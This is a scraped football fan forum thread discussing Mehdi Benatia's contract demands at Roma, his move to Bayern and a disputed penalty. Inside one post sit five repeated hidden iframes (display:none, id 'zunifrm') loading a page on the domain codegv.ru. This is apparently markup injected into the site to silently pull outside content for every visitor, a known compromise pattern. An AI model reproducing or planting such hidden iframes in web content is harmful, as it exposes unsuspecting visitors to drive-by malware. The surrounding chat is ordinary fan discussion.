Mehdi Benatia

M

Messi4life

A few days ago, Roma sporting director Walter Sabatini told more about what kind of bastard Mehdi Benatia really is!

In January he received external approaches and came to me saying That he wanted to stay in Rome under Certain Conditions and That if They were not realised then he would feel offended.

He wanted € 5m-per-season for five years.

A few days ago, Roma sporting director Walter Sabatini told more about what kind of bastard Mehdi Benatia really is!

In January he received external approaches and came to me saying That he wanted to stay in Rome under Certain Conditions and That if They were not realised then he would feel offended.

Oh no he wanted a raise. Such a bastard. Thank God we didn't sign him.

F

Flavia

Oh no he wanted a raise. Such a bastard. Thank God we didn't sign him.

There are ways and ways to negociate, that's almost a threat. Obviously if Sabatini is telling the truth, it could very well be an exaggeration or even a lie. If he is like that, and tries something on Pep, we'll probably hear about it.
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

KingMessi

SiempreBlaugrana

That's rumored to be 5M after taxes, mind.

zanela

From Benatia becoming a dressing room cancer to needing a desperate bid from Buyern to have him rid. Something doesn't compute. Either way, he's now at a club where his football and fin. ambitions will be addressed more than adequately. So I don't think Benatia the villian will show up again.

Also, who cares about how he treated Roma, how he behaved there or what he did to get a transfer? Bayern fans sure as hell don't. We wouldn't have cared either if we signed him.

I

instinct

his forehead reflected the stadium lights right in benatia's face. Can't blame him there

23hu5pe.jpg

btw this is a quality gif.

R

Ryu Hayabusa

Really lucky tonight... he had a clear foul inside the box which should have been given.

No. Not really "clear" at all.
Not "clearer" than those City handballs in their box at least.
Or that clear Sagna foul on Benatia himself during that one corner for that matter, preventing him from heading the ball perfectly.

Last edited:

BenRobbins

Yeah, says you. They were just as accidental as Sagna's 10 minute jersey pull against Benatia was accidental.

It was a 100% penalty there is no denying that, however i thought he played well last night apart from that despite not being match fit and it being his debut. What were your thoughts on his performance?

Home of Barca Fans